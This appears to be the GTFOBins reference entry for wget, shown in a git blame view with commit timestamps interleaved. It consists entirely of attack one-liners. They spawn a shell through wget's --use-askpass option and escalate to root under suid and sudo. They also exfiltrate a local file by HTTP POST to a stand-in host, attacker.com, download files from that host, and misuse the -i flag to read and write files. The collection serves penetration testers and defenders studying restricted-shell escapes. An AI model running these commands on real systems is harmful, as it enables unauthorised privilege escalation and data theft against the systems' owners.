GTFOBins.github.io/_gtfobins/wget.md

46 lines
1.7 KiB
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
shell:
- code: |
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
wget --use-askpass=$TF 0
2018-10-05 19:55:38 +02:00
file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
2018-07-16 15:01:50 +02:00
code: |
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
2021-05-15 19:21:30 +02:00
file-read:
- description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
code: |
LFILE=file_to_read
wget -i $LFILE
file-write:
- description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
code: |
LFILE=file_to_write
TF=$(mktemp)
echo DATA > $TF
wget -i $TF -o $LFILE
2018-10-05 19:55:38 +02:00
file-download:
2018-07-16 15:01:50 +02:00
- description: Fetch a remote file via HTTP GET request.
code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
2018-07-16 15:01:50 +02:00
wget $URL -O $LFILE
2018-10-05 19:55:38 +02:00
suid:
- code: |
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
./wget --use-askpass=$TF 0
2018-10-05 19:55:38 +02:00
sudo:
- code: |
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget --use-askpass=$TF 0
2018-05-25 01:10:39 +02:00
---